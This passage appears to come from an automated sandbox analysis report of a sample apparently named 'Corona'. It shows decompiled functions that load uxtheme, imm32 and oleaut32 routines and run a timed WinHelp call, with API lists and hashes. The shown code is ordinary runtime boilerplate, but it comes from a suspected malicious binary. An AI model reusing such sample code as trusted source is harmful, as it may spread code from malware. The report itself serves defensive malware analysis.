                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 1720852555-0
                                  • Opcode ID: 917127f4f3a077147801a2d069bb387387e8d0d55a4abb02a5392bdd6f5054ef
                                  • Instruction ID: e827ea6bbb3586439ad2d09fdcd350d6e3c7bf510f591e8dd60aea57682e3bbe
                                  • Opcode Fuzzy Hash: 917127f4f3a077147801a2d069bb387387e8d0d55a4abb02a5392bdd6f5054ef
                                  • Instruction Fuzzy Hash: 5D11E2716012005BEB54EF69C9C6F9737E8AF08304F49147ABA09DF297D679EC41CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004294BC, Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E004294BC(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x429539);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00428F1C(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00428B1C(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E0040430C(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x429540);
				return E00403E4C( &_v8);
			}









                                  0x004294bf
                                  0x004294c3
                                  0x004294c7
                                  0x004294c8
                                  0x004294cd
                                  0x004294d0
                                  0x004294d5
                                  0x004294df
                                  0x004294e1
                                  0x004294e3
                                  0x004294ef
                                  0x004294fd
                                  0x00429506
                                  0x0042950f
                                  0x0042951e
                                  0x0042951e
                                  0x00429525
                                  0x00429528
                                  0x0042952b
                                  0x00429538

                                  APIs
                                    • Part of subcall function 00428F1C: WinHelpA.USER32 ref: 00428F2B
                                  • GetTickCount.KERNEL32 ref: 004294DA
                                  • Sleep.KERNEL32(00000000,00000000,00429539,?,?,00000000,00000000,?,004294B2), ref: 004294E3
                                  • GetTickCount.KERNEL32 ref: 004294E8
                                  • WinHelpA.USER32 ref: 0042951E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CountHelpTick$Sleep
                                  • String ID:
                                  • API String ID: 2438605093-0
                                  • Opcode ID: 2648394aedcc0988b06fd2674811b10b7ee4e2b38959a4e77d98242bdde8c640
                                  • Instruction ID: 55332f343a0af43235d418ecb5ea4b194d2f74e408beee42534c5113f3eb7bf7
                                  • Opcode Fuzzy Hash: 2648394aedcc0988b06fd2674811b10b7ee4e2b38959a4e77d98242bdde8c640
                                  • Instruction Fuzzy Hash: EC01AD71704614AFE711FBA6DD52B1EB7A8DB08B04FA1417BF400A76C2DE7CAE009669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DBAC, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0041DBAC(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











                                  0x0041dbb2
                                  0x0041dbb5
                                  0x0041dbb8
                                  0x0041dbbc
                                  0x0041dbc1
                                  0x0041dbc7
                                  0x0041dbc8
                                  0x0041dbd2
                                  0x0041dbe5
                                  0x0041dbee
                                  0x0041dbf6
                                  0x0041dbf9
                                  0x0041dbf9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041dbd4
                                  0x0041dbd4
                                  0x0041dbd7
                                  0x0041dbd9
                                  0x0041dbdc
                                  0x0041dbdf
                                  0x0041dbdf
                                  0x00000000
                                  0x0041dbd4
                                  0x0041dc00

                                  APIs
                                  • GetSystemInfo.KERNEL32(?), ref: 0041DBBC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: InfoSystem
                                  • String ID:
                                  • API String ID: 31276548-0
                                  • Opcode ID: e8bcbb645ebc18f10774770217675841b7b668b79ed4c6f0fe3de0b884096808
                                  • Instruction ID: 163d5351bffbad75f50d43b398ea6638e4d7d1def341d60d56ddceec8c4e341b
                                  • Opcode Fuzzy Hash: e8bcbb645ebc18f10774770217675841b7b668b79ed4c6f0fe3de0b884096808
                                  • Instruction Fuzzy Hash: 12F0C2B1E0810D9BCB04DF98C484CDDB7B4FA5630171142AAC405DB342EB38BA81CB84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425634, Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00425634(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x452a40; // 0x2130dc8
				E0042542C(_t2);
				_push(_t111);
				_push(0x4259e7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x452a3c =  *0x452a3c + 1;
				if( *0x452a38 == 0) {
					 *0x452a38 = LoadLibraryA("uxtheme.dll");
					if( *0x452a38 > 0) {
						 *0x452978 = GetProcAddress( *0x452a38, "OpenThemeData");
						 *0x45297c = GetProcAddress( *0x452a38, "CloseThemeData");
						 *0x452980 = GetProcAddress( *0x452a38, "DrawThemeBackground");
						 *0x452984 = GetProcAddress( *0x452a38, "DrawThemeText");
						 *0x452988 = GetProcAddress( *0x452a38, "GetThemeBackgroundContentRect");
						 *0x45298c = GetProcAddress( *0x452a38, "GetThemeBackgroundContentRect");
						 *0x452990 = GetProcAddress( *0x452a38, "GetThemePartSize");
						 *0x452994 = GetProcAddress( *0x452a38, "GetThemeTextExtent");
						 *0x452998 = GetProcAddress( *0x452a38, "GetThemeTextMetrics");
						 *0x45299c = GetProcAddress( *0x452a38, "GetThemeBackgroundRegion");
						 *0x4529a0 = GetProcAddress( *0x452a38, "HitTestThemeBackground");
						 *0x4529a4 = GetProcAddress( *0x452a38, "DrawThemeEdge");
						 *0x4529a8 = GetProcAddress( *0x452a38, "DrawThemeIcon");
						 *0x4529ac = GetProcAddress( *0x452a38, "IsThemePartDefined");
						 *0x4529b0 = GetProcAddress( *0x452a38, "IsThemeBackgroundPartiallyTransparent");
						 *0x4529b4 = GetProcAddress( *0x452a38, "GetThemeColor");
						 *0x4529b8 = GetProcAddress( *0x452a38, "GetThemeMetric");
						 *0x4529bc = GetProcAddress( *0x452a38, "GetThemeString");
						 *0x4529c0 = GetProcAddress( *0x452a38, "GetThemeBool");
						 *0x4529c4 = GetProcAddress( *0x452a38, "GetThemeInt");
						 *0x4529c8 = GetProcAddress( *0x452a38, "GetThemeEnumValue");
						 *0x4529cc = GetProcAddress( *0x452a38, "GetThemePosition");
						 *0x4529d0 = GetProcAddress( *0x452a38, "GetThemeFont");
						 *0x4529d4 = GetProcAddress( *0x452a38, "GetThemeRect");
						 *0x4529d8 = GetProcAddress( *0x452a38, "GetThemeMargins");
						 *0x4529dc = GetProcAddress( *0x452a38, "GetThemeIntList");
						 *0x4529e0 = GetProcAddress( *0x452a38, "GetThemePropertyOrigin");
						 *0x4529e4 = GetProcAddress( *0x452a38, "SetWindowTheme");
						 *0x4529e8 = GetProcAddress( *0x452a38, "GetThemeFilename");
						 *0x4529ec = GetProcAddress( *0x452a38, "GetThemeSysColor");
						 *0x4529f0 = GetProcAddress( *0x452a38, "GetThemeSysColorBrush");
						 *0x4529f4 = GetProcAddress( *0x452a38, "GetThemeSysBool");
						 *0x4529f8 = GetProcAddress( *0x452a38, "GetThemeSysSize");
						 *0x4529fc = GetProcAddress( *0x452a38, "GetThemeSysFont");
						 *0x452a00 = GetProcAddress( *0x452a38, "GetThemeSysString");
						 *0x452a04 = GetProcAddress( *0x452a38, "GetThemeSysInt");
						 *0x452a08 = GetProcAddress( *0x452a38, "IsThemeActive");
						 *0x452a0c = GetProcAddress( *0x452a38, "IsAppThemed");
						 *0x452a10 = GetProcAddress( *0x452a38, "GetWindowTheme");
						 *0x452a14 = GetProcAddress( *0x452a38, "EnableThemeDialogTexture");
						 *0x452a18 = GetProcAddress( *0x452a38, "IsThemeDialogTextureEnabled");
						 *0x452a1c = GetProcAddress( *0x452a38, "GetThemeAppProperties");
						 *0x452a20 = GetProcAddress( *0x452a38, "SetThemeAppProperties");
						 *0x452a24 = GetProcAddress( *0x452a38, "GetCurrentThemeName");
						 *0x452a28 = GetProcAddress( *0x452a38, "GetThemeDocumentationProperty");
						 *0x452a2c = GetProcAddress( *0x452a38, "DrawThemeParentBackground");
						 *0x452a30 = GetProcAddress( *0x452a38, "EnableTheming");
					}
				}
				_v5 =  *0x452a38 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x4259ee);
				_t6 =  *0x452a40; // 0x2130dc8
				return E00425434(_t6);
			}








                                  0x0042563e
                                  0x00425643
                                  0x0042564a
                                  0x0042564b
                                  0x00425650
                                  0x00425653
                                  0x00425656
                                  0x0042565f
                                  0x0042566f
                                  0x00425674
                                  0x00425687
                                  0x00425699
                                  0x004256ab
                                  0x004256bd
                                  0x004256cf
                                  0x004256e1
                                  0x004256f3
                                  0x00425705
                                  0x00425717
                                  0x00425729
                                  0x0042573b
                                  0x0042574d
                                  0x0042575f
                                  0x00425771
                                  0x00425783
                                  0x00425795
                                  0x004257a7
                                  0x004257b9
                                  0x004257cb
                                  0x004257dd
                                  0x004257ef
                                  0x00425801
                                  0x00425813
                                  0x00425825
                                  0x00425837
                                  0x00425849
                                  0x0042585b
                                  0x0042586d
                                  0x0042587f
                                  0x00425891
                                  0x004258a3
                                  0x004258b5
                                  0x004258c7
                                  0x004258d9
                                  0x004258eb
                                  0x004258fd
                                  0x0042590f
                                  0x00425921
                                  0x00425933
                                  0x00425945
                                  0x00425957
                                  0x00425969
                                  0x0042597b
                                  0x0042598d
                                  0x0042599f
                                  0x004259b1
                                  0x004259c3
                                  0x004259c3
                                  0x00425674
                                  0x004259cb
                                  0x004259d1
                                  0x004259d4
                                  0x004259d7
                                  0x004259dc
                                  0x004259e6

                                  APIs
                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,004259E7), ref: 0042566A
                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00425682
                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00425694
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 004256A6
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 004256B8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004256CA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004256DC
                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 004256EE
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00425700
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00425712
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00425724
                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00425736
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00425748
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042575A
                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042576C
                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042577E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00425790
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 004257A2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 004257B4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 004257C6
                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 004257D8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 004257EA
                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 004257FC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042580E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00425820
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00425832
                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00425844
                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 00425856
                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00425868
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042587A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042588C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042589E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 004258B0
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 004258C2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 004258D4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 004258E6
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 004258F8
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042590A
                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042591C
                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042592E
                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00425940
                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00425952
                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00425964
                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 00425976
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00425988
                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042599A
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004259AC
                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 004259BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                  • API String ID: 2238633743-2910565190
                                  • Opcode ID: f7f4783a9a88d08bd4dddb214be36be475cd07fdfb673d69e6eb84982f0c0870
                                  • Instruction ID: b08a24b3ffc27a05fdf412353021a04610787556389c2f22dc50307e4adaf93b
                                  • Opcode Fuzzy Hash: f7f4783a9a88d08bd4dddb214be36be475cd07fdfb673d69e6eb84982f0c0870
                                  • Instruction Fuzzy Hash: 4DA10EB0B45B64AFDF00EB65ED86A2637A8EB167017A00577B400DF296D6B8DD00CF6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00439734, Relevance: 50.8, APIs: 15, Strings: 14, Instructions: 95libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00439734() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x45112c; // 0x452740
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x43989a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x452b64 == 0) {
						 *0x452b64 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x450b00 == 0) {
						 *0x450b00 = LoadLibraryA("imm32.dll");
						if( *0x450b00 != 0) {
							_t11 =  *0x450b00; // 0x0
							 *0x452b68 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x450b00; // 0x0
							 *0x452b6c = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x450b00; // 0x0
							 *0x452b70 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x450b00; // 0x0
							 *0x452b74 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x450b00; // 0x0
							 *0x452b78 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x450b00; // 0x0
							 *0x452b7c = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x450b00; // 0x0
							 *0x452b80 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x450b00; // 0x0
							 *0x452b84 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x450b00; // 0x0
							 *0x452b88 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x450b00; // 0x0
							 *0x452b8c = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x4398a1);
					return SetErrorMode(_v8);
				}
			}


















                                  0x00439735
                                  0x00439739
                                  0x00439742
                                  0x004398a4
                                  0x00439748
                                  0x00439752
                                  0x00439757
                                  0x00439758
                                  0x0043975d
                                  0x00439760
                                  0x0043976a
                                  0x00439783
                                  0x00439783
                                  0x0043978f
                                  0x0043979f
                                  0x004397ab
                                  0x004397b6
                                  0x004397c1
                                  0x004397cb
                                  0x004397d6
                                  0x004397e0
                                  0x004397eb
                                  0x004397f5
                                  0x00439800
                                  0x0043980a
                                  0x00439815
                                  0x0043981f
                                  0x0043982a
                                  0x00439834
                                  0x0043983f
                                  0x00439849
                                  0x00439854
                                  0x0043985e
                                  0x00439869
                                  0x00439873
                                  0x0043987e
                                  0x0043987e
                                  0x004397ab
                                  0x00439885
                                  0x00439888
                                  0x0043988b
                                  0x00439899
                                  0x00439899

                                  APIs
                                  • SetErrorMode.KERNEL32(00008000), ref: 0043974D
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,0043989A,?,00008000), ref: 00439771
                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0043977E
                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,0043989A,?,00008000), ref: 0043979A
                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004397BC
                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004397D1
                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004397E6
                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004397FB
                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00439810
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00439825
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0043983A
                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0043984F
                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00439864
                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00439879
                                  • SetErrorMode.KERNEL32(?,004398A1,00008000), ref: 00439894
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                  • String ID: @'E$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                  • API String ID: 3397921170-1903349282
                                  • Opcode ID: d0908dcf3a2a8b3b2bb8657387a1d8d95a7187f466a1275df40fec1c1dabca2f
                                  • Instruction ID: 336c5207b433e9d0613543334c10ac230abcfd525e1b43fdda901f9345ddfeb5
                                  • Opcode Fuzzy Hash: d0908dcf3a2a8b3b2bb8657387a1d8d95a7187f466a1275df40fec1c1dabca2f
                                  • Instruction Fuzzy Hash: 97313FB9914744AEDB04EFA1ED96A2637A8E749705F24143BB0409B292D6FCED00CF1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D5F4, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D5F4() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4527a0 = E0040D5C8("VariantChangeTypeEx", E0040D164, _t91);
				 *0x4527a4 = E0040D5C8("VarNeg", E0040D194, _t91);
				 *0x4527a8 = E0040D5C8("VarNot", E0040D194, _t91);
				 *0x4527ac = E0040D5C8("VarAdd", E0040D1A0, _t91);
				 *0x4527b0 = E0040D5C8("VarSub", E0040D1A0, _t91);
				 *0x4527b4 = E0040D5C8("VarMul", E0040D1A0, _t91);
				 *0x4527b8 = E0040D5C8("VarDiv", E0040D1A0, _t91);
				 *0x4527bc = E0040D5C8("VarIdiv", E0040D1A0, _t91);
				 *0x4527c0 = E0040D5C8("VarMod", E0040D1A0, _t91);
				 *0x4527c4 = E0040D5C8("VarAnd", E0040D1A0, _t91);
				 *0x4527c8 = E0040D5C8("VarOr", E0040D1A0, _t91);
				 *0x4527cc = E0040D5C8("VarXor", E0040D1A0, _t91);
				 *0x4527d0 = E0040D5C8("VarCmp", E0040D1AC, _t91);
				 *0x4527d4 = E0040D5C8("VarI4FromStr", E0040D1B8, _t91);
				 *0x4527d8 = E0040D5C8("VarR4FromStr", E0040D224, _t91);
				 *0x4527dc = E0040D5C8("VarR8FromStr", E0040D290, _t91);
				 *0x4527e0 = E0040D5C8("VarDateFromStr", E0040D2FC, _t91);
				 *0x4527e4 = E0040D5C8("VarCyFromStr", E0040D368, _t91);
				 *0x4527e8 = E0040D5C8("VarBoolFromStr", E0040D3D4, _t91);
				 *0x4527ec = E0040D5C8("VarBstrFromCy", E0040D454, _t91);
				 *0x4527f0 = E0040D5C8("VarBstrFromDate", E0040D4C4, _t91);
				_t46 = E0040D5C8("VarBstrFromBool", E0040D534, _t91);
				 *0x4527f4 = _t46;
				return _t46;
			}






                                  0x0040d602
                                  0x0040d616
                                  0x0040d62c
                                  0x0040d642
                                  0x0040d658
                                  0x0040d66e
                                  0x0040d684
                                  0x0040d69a
                                  0x0040d6b0
                                  0x0040d6c6
                                  0x0040d6dc
                                  0x0040d6f2
                                  0x0040d708
                                  0x0040d71e
                                  0x0040d734
                                  0x0040d74a
                                  0x0040d760
                                  0x0040d776
                                  0x0040d78c
                                  0x0040d7a2
                                  0x0040d7b8
                                  0x0040d7ce
                                  0x0040d7de
                                  0x0040d7e4
                                  0x0040d7eb

                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040D5FD
                                    • Part of subcall function 0040D5C8: GetProcAddress.KERNEL32(00000000), ref: 0040D5E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  • API String ID: 1646373207-1918263038
                                  • Opcode ID: 595c52bc1de888a877c2591ff9daa0970fa00584c0c85f1941bccf92f21e24e7
                                  • Instruction ID: 623002e170f160f2225b64dbb8fcaf23227ea13e97c7967c2e6102d296ea26ef
                                  • Opcode Fuzzy Hash: 595c52bc1de888a877c2591ff9daa0970fa00584c0c85f1941bccf92f21e24e7
                                  • Instruction Fuzzy Hash: 0941D362E543086FD304BBEE7D014267BD8D7897183A0D03FF814AA6DADF7CA949462D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

